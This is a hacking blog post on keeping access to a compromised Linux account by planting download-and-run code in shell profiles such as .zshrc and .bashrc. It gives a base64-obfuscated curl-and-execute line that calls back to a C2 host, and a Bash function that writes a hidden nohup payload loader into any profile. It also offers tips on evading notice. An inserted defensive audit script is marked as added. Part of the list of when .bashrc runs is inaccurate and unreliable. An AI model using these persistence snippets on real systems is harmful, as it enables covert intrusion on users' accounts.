Just a quick piece on persistence using shell profiles and a bit of Bash :)

So, what's persistence? It's setting up a way for a payload or script to run so we get access back to a system we already gained access to, so we can keep working :). And why shell profiles? Because we can be sure they will run at some point, and most users don't really check their shell profiles, so there's a chance we can fly under the radar, at least for a bit.

The second reason is that if we only have an ordinary user account and can't get root, we can't write to system files, but we can almost always write to the user's own files, and that includes config files. So if everything else fails, shell profiles are a good candidate for entry-level access.

And the last reason is that we can use any command we can issue in a shell, including Bash scripting, so we can do some pretty advanced stuff in an easy way, using the standard shell language and its functions.

So, what files do we need to look at, and for what?
It depends on which shell it is, so let's take a peek and start by finding out which shell we're working with. In a terminal, run this:

echo $SHELL
/usr/bin/zsh

When I run "echo $SHELL", it says it's /usr/bin/zsh, so my config file would be .zshrc, located in my home directory (/home/user). So, how do we use it?

We simply open the file in a text editor and add something like this:

if [ -f /tmp/PAYLOAD ]; then
    rm /tmp/PAYLOAD && echo "Y3VybCAtcyBodHRwOi8vMTAuMC4wLjkzL3BheWxvYWRzL0ZBTU9VU19RVUFMSVRZICA+IC90bXAvRkFNT1VTX1FVQUxJVFk7Y2htb2QgK3ggL3RtcC9GQU1PVVNfUVVBTElUWTsvdG1wL0ZBTU9VU19RVUFMSVRZICYK" | base64 -d | /bin/bash
else
    echo "Y3VybCAtcyBodHRwOi8vMTAuMC4wLjkzL3BheWxvYWRzL0ZBTU9VU19RVUFMSVRZICA+IC90bXAvRkFNT1VTX1FVQUxJVFk7Y2htb2QgK3ggL3RtcC9GQU1PVVNfUVVBTElUWTsvdG1wL0ZBTU9VU19RVUFMSVRZICYK" | base64 -d | /bin/bash
fi

It's just a quick Bash if/else statement that checks whether the payload is already set up in /tmp: if it is, it removes it and installs it again, and if it isn't, it simply downloads and runs it.
Now, every time I open a new interactive shell (a normal terminal window), this condition fires and loads the payload, giving me a shell back on the C2 system.

A somewhat better version could look like this. It's a Bash function that, when run, asks for the path of the profile file and writes the lines we need into it.

#function to set up Shell persistence in normal user context.
#(the original omits the function's opening line; the name below is added here)
setup_profile_persistence() {

read -p "Enter shell profile file path (e.g. /home/userx/.zshrc): " profilepath
#append the if/else block to the chosen profile file
cat >> "$profilepath" << EOF
if [ -f /tmp/PAYLOAD ]; then
	rm /tmp/PAYLOAD
	curl -s http://PAYLOAD_SERVER/payloads/PAYLOAD  > /tmp/PAYLOAD
	chmod +x /tmp/PAYLOAD
	nohup /tmp/PAYLOAD >/dev/null 2>&1 &
	#disown
else
	curl -s http://PAYLOAD_SERVER/payloads/PAYLOAD  > /tmp/PAYLOAD
	chmod +x /tmp/PAYLOAD
	nohup /tmp/PAYLOAD >/dev/null 2>&1 &
	#disown
fi
EOF

echo "Patched profile file - verify manually..."
}

So, why nohup? Because if you don't use it, your payload dies when the user exits the shell, and the redirection hides the output, so nothing suspicious shows up in the terminal.

Yes, I would like to point out that this will fire a new payload when the shell is run, so add your own checks for that, so it only runs once, or, depending on what C2 you run, get it to drop redundant connect-back shells.
The reason I don't is that it would mean using system tools like grep and ps, and I hide my payloads from normal system tools, so it wouldn't make much sense to include functions like that.

Now, what about Bash? That's almost as simple, but not quite.

/etc/skel/.bashrc - This file is used as a skeleton when new users are added, so anything you put in here gets added to every new user's .bashrc. To edit this file, you need root rights.

/home/userx/.bashrc - This file is read every time the user opens a new terminal, if their shell is Bash.

/root/.bashrc - This is the root user's bashrc.

Bashrc gets read in the following situations:

  • When you log in,
  • When you run certain commands (bash scripts),
  • When copying error files or output,
  • When you run compute jobs,
  • At the end of a job

Now, there's another file that's interesting to us: .profile. The ksh, Bourne, Bash, Tcsh and Csh shells read it, so using that is also a good bet, and yes, like the other files, it's standard Bash scripting.
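As the defender's counterpart to the above, here is an added audit script (not from the original post) that checks the profile files named in this post for the constructs the two snippets rely on: a base64-decoded command piped into a shell, a download written to /tmp, chmod +x on a /tmp file, and a backgrounded nohup of something in /tmp. The file list and the regexes are my own assumptions, and the sample home directory it builds is a constructed fixture.

```shell
# Added example, not from the post: audit a home directory's shell profile files
# for the constructs the post's snippets use.  Usage: bash audit.sh /home/userx
PROFILE_NAMES=(.bashrc .bash_profile .bash_login .profile .zshrc .zprofile)
# Tell-tale constructs (extended regexes): a base64-decoded blob piped into a shell,
# a download written to /tmp, chmod +x on a /tmp file, a backgrounded nohup of /tmp/*.
PATTERNS=(
  'base64[[:space:]]+(-d|--decode)[[:space:]]*[|][[:space:]]*(/bin/|/usr/bin/)?(ba)?sh($|[[:space:]])'
  '(curl|wget)[[:space:]].*>[[:space:]]*/tmp/'
  'chmod[[:space:]]+[+]x[[:space:]]+/tmp/'
  'nohup[[:space:]]+/tmp/[^[:space:]]+.*&'
)

# scan_profile FILE: print "file:line: /pattern/: text" per match; return 1 if any
# matched, 0 if the file is clean or unreadable.
scan_profile() {
  local file=$1 hits=0 lineno=0 line pat
  [ -r "$file" ] || return 0
  while IFS= read -r line || [ -n "$line" ]; do
    lineno=$((lineno + 1))
    for pat in "${PATTERNS[@]}"; do
      if printf '%s\n' "$line" | grep -Eq -- "$pat"; then
        printf '%s:%d: /%s/: %s\n' "$file" "$lineno" "$pat" "$line"
        hits=1
      fi
    done
  done < "$file"
  return "$hits"
}

# scan_home DIR: scan every known profile file under DIR; return 1 if any matched.
scan_home() {
  local dir=$1 name rc=0
  for name in "${PROFILE_NAMES[@]}"; do
    scan_profile "$dir/$name" || rc=1
  done
  return "$rc"
}

# make_sample_home: constructed fixture in a temp dir. Its .zshrc has two harmless
# lines plus one line of each construct (the base64 text just decodes to "AAAA").
make_sample_home() {
  local dir; dir=$(mktemp -d)
  printf 'export EDITOR=vim\nalias ll="ls -l"\n' > "$dir/.zshrc"
  printf 'echo "QUFBQQ==" | base64 -d | /bin/bash\n' >> "$dir/.zshrc"
  printf 'curl -s http://PAYLOAD_SERVER/payloads/PAYLOAD > /tmp/PAYLOAD\n' >> "$dir/.zshrc"
  printf 'chmod +x /tmp/PAYLOAD\nnohup /tmp/PAYLOAD >/dev/null 2>&1 &\n' >> "$dir/.zshrc"
  echo "$dir"
}
if [ -n "${1-}" ]; then scan_home "$1"; fi
```

Run it against each home directory plus /etc/skel and /root; a non-zero exit means at least one profile file needs a manual look.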

So, there you go: install a virtual machine, play around with these files and see how it works ;)

Much Happy Hacking ;)
